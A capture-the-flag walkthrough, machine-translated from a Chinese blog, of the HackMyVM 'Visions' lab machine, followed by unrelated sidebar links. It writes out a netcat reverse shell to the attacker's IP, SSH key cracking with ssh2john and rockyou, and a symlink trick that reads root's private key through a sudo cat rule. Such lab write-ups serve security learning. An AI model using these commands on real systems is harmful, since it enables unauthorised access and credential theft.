当前位置:网站首页>Hackmyvm target series (3) -visions
Hackmyvm target series (3) -visions
2022-07-06 13:57:00 【The moon should know my meaning】
One 、 information gathering
Probe network segment first , Get the target host
nmap -sP 192.168.200.0/24 | grep -i -B 2 virtualbox
Then perform port scanning , Find out ssh Service and http service
nmap -sC -sV -p- 192.168.200.234
Visit http service , I found only one picture and a comment .
This comment looks like a hint ,aliccia Guess it may be a user
Use dirsearch Scan the directory , See what you can get
dirsearch -u http://192.168.200.234/ -e php,html,txt,bak,zip,7z,gz,db -x 404,301,500,502
However, there is nothing
According to its cue , Download the pictures , Check the metadata of the image
curl http://192.168.200.234/white.png -o white.png
./exiftool white.png
Pictured , Found the password
Tool usage and download :
ExifTool Complete introduction guide
alicia:ihaveadream
Two 、 Exploit
Login successfully
I didn't find it in the current directory after I came in flag, After looking at the home directory, I found 4 Users , And then in sophia Found... In the directory flag, But I don't have permission , Can not run .
Then try raising the right first ?
sudo -l
It is found that the current user can emma Run as user nc Without using a password .
In that case , Then bounce first shell try .
kali On the listening port
Then execute the following command statement on the target machine
sudo -u emma nc 192.168.200.192 10000 -e /bin/bash
Successfully accepted shell, Use python Get an interactive shell
python -c 'import pty; pty.spawn("/bin/bash")'
Found a in the current directory note.txt file , The contents are as follows .
I can't help it ??? I don't know what it means .
Then I checked again suid and sudo Raise the right , There is no breakthrough .
Later I saw the boss's wp, I found that I need to use some image processing tools
After uploading the picture , Click the arrow .
Then you can see the user name and password , This question is true , The information is all hidden in this picture
sophia:seemstobeimpossible
Login successful
The current user can use any user's identity cat Command view .invisible file . This means that we use cat Command to view the file with root jurisdiction .
Open it up , Is the user isabella Your private key , Take it to login
I still have to enter the password .
We can only start blasting
have access to john the ripper Blasting , But first use the following command to id_rsa Convert to john Recognable hash value
python3 /usr/share/john/ssh2john.py id_rsa > crack.txt
I use script here to explode .
rockyou.txt yes kali A dictionary comes with you ,/usr/share/wordlists/rockyou.txt.gz, You need to decompress it before using , Otherwise, there will be confusion
gzip -d rockyou.txt.gz
Successfully burst the password ( Password in 1 More than ten thousand lines , But here because of writing wp I put it in front )
invisible
Pictured , Login successful
Start from below , Because of changing a network , So this IP Changed
3、 ... and 、 Elevated privileges
Here to see if there are any orders that can be used to raise power
However, there is no breakthrough
Then suddenly remembered before sophia The user to use cat Command read .invisible The file has root The powers of the , Can I use isabella Users will .invisiblla Users link to root The user's private key goes up ?
Create soft link
ln -sf /root/.ssh/id_rsa .invisible
Read root User's private key
sudo cat /home/isabella/.invisible
There will be a small problem when logging in with the private key , Too high permission will cause login failure .
Reduce permissions , Log in again
chmod 600 key
Login successful , get root jurisdiction
边栏推荐
- 实验八 异常处理
- Zatan 0516
- Mixlab unbounded community white paper officially released
- 力扣152题乘数最大子数组
- Renforcer les dossiers de base de l'apprentissage
- SRC挖掘思路及方法
- 强化学习基础记录
- 强化学习基础记录
- 1. Preliminary exercises of C language (1)
- Intensive literature reading series (I): Courier routing and assignment for food delivery service using reinforcement learning
猜你喜欢
Have you encountered ABA problems? Let's talk about the following in detail, how to avoid ABA problems
A comprehensive summary of MySQL transactions and implementation principles, and no longer have to worry about interviews
Callback function ----------- callback
仿牛客技术博客项目常见问题及解答(二)
C language Getting Started Guide
甲、乙机之间采用方式 1 双向串行通信,具体要求如下: (1)甲机的 k1 按键可通过串行口控制乙机的 LEDI 点亮、LED2 灭,甲机的 k2 按键控制 乙机的 LED1
Reinforcement learning series (I): basic principles and concepts
HackMyvm靶机系列(5)-warez
Mode 1 two-way serial communication is adopted between machine a and machine B, and the specific requirements are as follows: (1) the K1 key of machine a can control the ledi of machine B to turn on a
HackMyvm靶机系列(7)-Tron
随机推荐
Implementation of count (*) in MySQL
[hand tearing code] single case mode and producer / consumer mode
MySQL lock summary (comprehensive and concise + graphic explanation)
. How to upload XMIND files to Jinshan document sharing online editing?
[VMware abnormal problems] problem analysis & Solutions
[insert, modify and delete data in the headsong educator data table]
甲、乙机之间采用方式 1 双向串行通信,具体要求如下: (1)甲机的 k1 按键可通过串行口控制乙机的 LEDI 点亮、LED2 灭,甲机的 k2 按键控制 乙机的 LED1
强化学习系列(一):基本原理和概念
[dark horse morning post] Shanghai Municipal Bureau of supervision responded that Zhong Xue had a high fever and did not melt; Michael admitted that two batches of pure milk were unqualified; Wechat i
The difference between overloading and rewriting
Matlab opens M file garbled solution
实验五 类和对象
HackMyvm靶机系列(5)-warez
力扣152题乘数最大子数组
Canvas foundation 1 - draw a straight line (easy to understand)
Nuxtjs quick start (nuxt2)
SRC挖掘思路及方法
[the Nine Yang Manual] 2020 Fudan University Applied Statistics real problem + analysis
[modern Chinese history] Chapter V test
Safe driving skills on ice and snow roads